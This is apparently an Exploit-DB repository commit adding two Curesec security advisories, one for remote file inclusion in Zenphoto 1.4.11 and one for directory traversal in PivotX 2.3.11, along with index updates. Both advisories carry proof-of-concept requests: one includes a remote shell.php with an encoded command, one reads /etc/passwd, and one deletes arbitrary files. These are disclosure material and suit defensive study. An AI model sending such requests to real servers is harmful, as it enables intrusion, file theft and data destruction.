DB: 2016-03-18

Offensive Security · Offensive Security · commit 49a8e7debdb9 · 2016-03-18T05:03:26.000Z
2 new exploits

file
Zenphoto 1.4.11 - Remote File Inclusion

Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability
Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability
file
PivotX 2.3.11 - Directory Traversal
diff --git a/files.csv b/files.csv
@@ -13243,6 +13243,7 @@ id,file,description,date,author,platform,type,port
 15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
 15225,platforms/php/webapps/15225.txt,"videodb <= 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
+39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
 15269,platforms/php/webapps/15269.txt,"Tastydir <= 1.2 (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0
 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability",2010-10-10,"Easy Laster",php,webapps,0
 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
@@ -33347,7 +33348,7 @@ id,file,description,date,author,platform,type,port
 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
 36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
-36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
+36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross Site Scripting Vulnerability",2012-03-12,"Simon Ganiere",php,webapps,0
 36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection Vulnerability",2012-03-12,l20ot,hardware,remote,0
 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 Advanced Search Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0
 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 Search Field XSS",2012-03-12,"Stefan Schurtz",php,webapps,0
@@ -35803,3 +35804,4 @@ id,file,description,date,author,platform,type,port
 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
+39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
diff --git a/platforms/php/webapps/39571.txt b/platforms/php/webapps/39571.txt
@@ -0,0 +1,105 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product:   Zenphoto 1.4.11
+Fixed in:           1.4.12
+Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
+                    zenphoto-1.4.12.zip
+Vendor Website:     http://www.zenphoto.org/
+Vulnerability Type: RFI
+Remote Exploitable: Yes
+Reported to vendor: 01/29/2016
+Disclosed to        03/15/2016
+public:
+Release mode:       Coordinated Release
+CVE:                n/a
+Credits             Tim Coen of Curesec GmbH
+
+2. Overview
+
+Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
+vulnerable to remote file inclusion. An admin account is required.
+
+3. Details
+
+Description
+
+CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
+
+When downloading a log file, the input is not properly sanitized, leading to
+RFI.
+
+An admin account is required, and allow_url_fopen must be set to true - which
+is the default setting.
+
+In old versions of PHP, this would additionally lead to LFI via null byte
+poisoning or path expansion, regardless of allow_url_fopen settings.
+
+Proof of Concept
+
+GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
+logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
+security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
+
+Code
+
+// admin-logs.php (sanitize(x, 3) only strips out tags)
+    case 'download_log':
+	    $zipname = sanitize($_GET['tab'], 3) . '.zip';
+	    if (class_exists('ZipArchive')) {
+		    $zip = new ZipArchive;
+		    $zip->open($zipname, ZipArchive::CREATE);
+		    $zip->addFile($file, basename($file));
+		    $zip->close();
+		    ob_get_clean();
+		    header("Pragma: public");
+		    header("Expires: 0");
+		    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+		    header("Cache-Control: private", false);
+		    header("Content-Type: application/zip");
+		    header("Content-Disposition: attachment; filename=" . basename($zipname) . ";" );
+		    header("Content-Transfer-Encoding: binary");
+		    header("Content-Length: " . filesize($zipname));
+		    readfile($zipname);
+		    // remove zip file from temp path
+		    unlink($zipname);
+		    exit;
+	    } else {
+		    include_once(SERVERPATH . '/' . ZENFOLDER . '/lib-zipStream.php');
+		    $zip = new ZipStream($zipname);
+		    $zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
+		    $zip->finish();
+	    }
+	    break;
+
+4. Solution
+
+To mitigate this issue please upgrade at least to version 1.4.12:
+
+https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
+
+Please note that a newer version might already be available.
+
+5. Report Timeline
+
+01/29/2016 Informed Vendor about Issue
+01/29/2016 Vendor replies
+02/23/2016 Vendor sends fix for verification
+02/23/2016 Suggested improvements for attempted fix
+02/29/2016 Delayed Disclosure
+03/14/2016 Vendor releases fix
+03/15/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
+ 
+--
+blog:  https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany
diff --git a/platforms/php/webapps/39572.txt b/platforms/php/webapps/39572.txt
@@ -0,0 +1,78 @@
+Security Advisory - Curesec Research Team
+
+1. Introduction
+
+Affected Product:    PivotX 2.3.11
+Fixed in:            not fixed
+Fixed Version Link:  n/a
+Vendor Website:      http://pivotx.net/
+Vulnerability Type:  Directory Traversal
+Remote Exploitable:  Yes
+Reported to vendor:  01/20/2016
+Disclosed to public: 03/15/2016
+Release mode:        Full Disclosure
+CVE:                 n/a
+Credits              Tim Coen of Curesec GmbH
+
+2. Overview
+
+PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
+vulnerable to Directory Traversal, allowing authenticated users to read and
+delete files outside of the PivotX directory.
+
+3. Details
+
+Description
+
+CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
+
+The function cleanPath which is responsible for sanitizing path names can be
+bypassed by an attacker, leading to directory traversal in multiple places.
+
+Proof of Concept
+
+Admins and Superadmins can read any file:
+
+http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
+L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
+/.....//...//.....//...//.....//...//.....//...//etc/passwd
+
+Advanced users, Admins and Superadmins can delete any file, possibly leading to
+DOS:
+
+http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
+/.....//...//.....//...//.....//...//.....//...//.....//...//important/
+important.file&pivotxsession=ovyyn4ob2jc5ym92
+
+Code
+
+lib.php
+function cleanPath($path) {
+    $path = str_replace('../', '', $path);
+    $path = str_replace('..\\', '', $path);
+    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
+    return $path;
+}
+
+4. Solution
+
+This issue was not fixed by the vendor.
+
+5. Report Timeline
+
+01/20/2016 Informed Vendor about Issue
+01/29/2016 Vendor replies, PivotX is not maintained anymore
+03/15/2016 Disclosed to public
+
+
+Blog Reference:
+https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
+ 
+--
+blog:  https://blog.curesec.com
+tweet: https://twitter.com/curesec
+
+Curesec GmbH
+Curesec Research Team
+Romain-Rolland-Str 14-24
+13089 Berlin, Germany
